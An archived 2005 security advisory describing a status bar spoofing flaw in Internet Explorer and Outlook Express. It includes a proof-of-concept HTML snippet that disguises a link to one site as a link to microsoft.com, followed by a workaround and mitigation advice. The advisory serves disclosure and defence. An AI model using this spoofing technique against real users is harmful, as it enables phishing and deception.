what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

ieAgain.txt

ieAgain.txt
Posted Feb 25, 2005
Authored by bitlance winter

A variation of the status bar spoofing flaw in Internet Explorer has been discovered using the label for id trick.

tags | advisory, spoof
SHA-256 | c80295d0329225420d26b9c369016b8552f9c5bdb1bc1cf2e635891d75758745

ieAgain.txt

Change Mirror Download
Hi LIST.

It is normally possible for script code to manipulate information displayed
in the status bar in the Internet Zone. By default, Outlook Express 6 open
HTML e-mail messages in the Restricted sites zone instead of the Internet
Zone. Outlook Express users may especially trust information displayed in
the status bar since HTML documents are viewed in context of the
"Restricted" zone, which has scripting support disabled.

However, errors in Internet Explorer allows manipulation of the status bar
without using any script code. This can be exploited by embedding a
specially crafted form in a link.

http-equiv has discovered a weakness in Internet Explorer, which
potentially can be exploited by malicious people to trick users into
visiting a malicious website which facilitates a "phishing" attack. (
CAN-2004-1104 )

Now another weakness which use a "label for id trick" has been discovered.
This weakness is a variant of CAN-2004-1104.

Example:
- -----8<----- -----8<----- -----8<----- -----8<-----

[!-- saved from url=(0007)https:// -->
[body style="color: WindowText; background-color: Window;">
[div>IE/OE Restricted Zone Status Bar Spoofing[/div>
[div>Tested on Windows XP with SP2 installed.[/div>
[p>[a id="SPOOF" href="https://www.example.com/?maliciouscontents">[/a>[/p>
[div>
[a href="https://www.microsoft.com/windows/default.mspx">
[table>
[caption>
[a href="https://www.microsoft.com/windows/default.mspx ">
[label for="SPOOF">
[u style="cursor: pointer; color: blue">
https://www.microsoft.com/windows/default.mspx
[/u>
[/label>
[/a>
[/caption>
[/table>
[/a>
[/div>

- -----8<----- -----8<----- -----8<----- -----8<-----

workaround:( on Windows XP Service Pack 2 )

You can change the zone elevation setting under for each security zone by
configuring the following option from Allow to Disabled or Prompt in the
Custom Level Security dialog.
"Web sites in less privileged Web content zones can navigate into this
zone"

https://www.microsoft.com/technet/prodtechnol/winxppro/maintain/mangxpsp2/mngieps.mspx



Solution:
Never follow links from untrusted sources.

Read e-mail messages in plain text format if you are using Outlook Express
6 SP1 or a later version , to help protect yourself from the HTML e-mail
attack vector.

REGARDS.

--

bitlance winter

_________________________________________________________________
$BL5NAMFNL(B250MB$B$G%Q%o!<%"%C%W(B $B!V(BMSN Hotmail$B!W(B https://www.hotmail.com/

Login or Register to add favorites

File Archive:

September 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Sep 1st
    261 Files
  • 2
    Sep 2nd
    17 Files
  • 3
    Sep 3rd
    38 Files
  • 4
    Sep 4th
    52 Files
  • 5
    Sep 5th
    23 Files
  • 6
    Sep 6th
    27 Files
  • 7
    Sep 7th
    0 Files
  • 8
    Sep 8th
    1 Files
  • 9
    Sep 9th
    16 Files
  • 10
    Sep 10th
    38 Files
  • 11
    Sep 11th
    21 Files
  • 12
    Sep 12th
    40 Files
  • 13
    Sep 13th
    18 Files
  • 14
    Sep 14th
    0 Files
  • 15
    Sep 15th
    0 Files
  • 16
    Sep 16th
    21 Files
  • 17
    Sep 17th
    51 Files
  • 18
    Sep 18th
    23 Files
  • 19
    Sep 19th
    48 Files
  • 20
    Sep 20th
    36 Files
  • 21
    Sep 21st
    0 Files
  • 22
    Sep 22nd
    0 Files
  • 23
    Sep 23rd
    38 Files
  • 24
    Sep 24th
    0 Files
  • 25
    Sep 25th
    0 Files
  • 26
    Sep 26th
    0 Files
  • 27
    Sep 27th
    0 Files
  • 28
    Sep 28th
    0 Files
  • 29
    Sep 29th
    0 Files
  • 30
    Sep 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close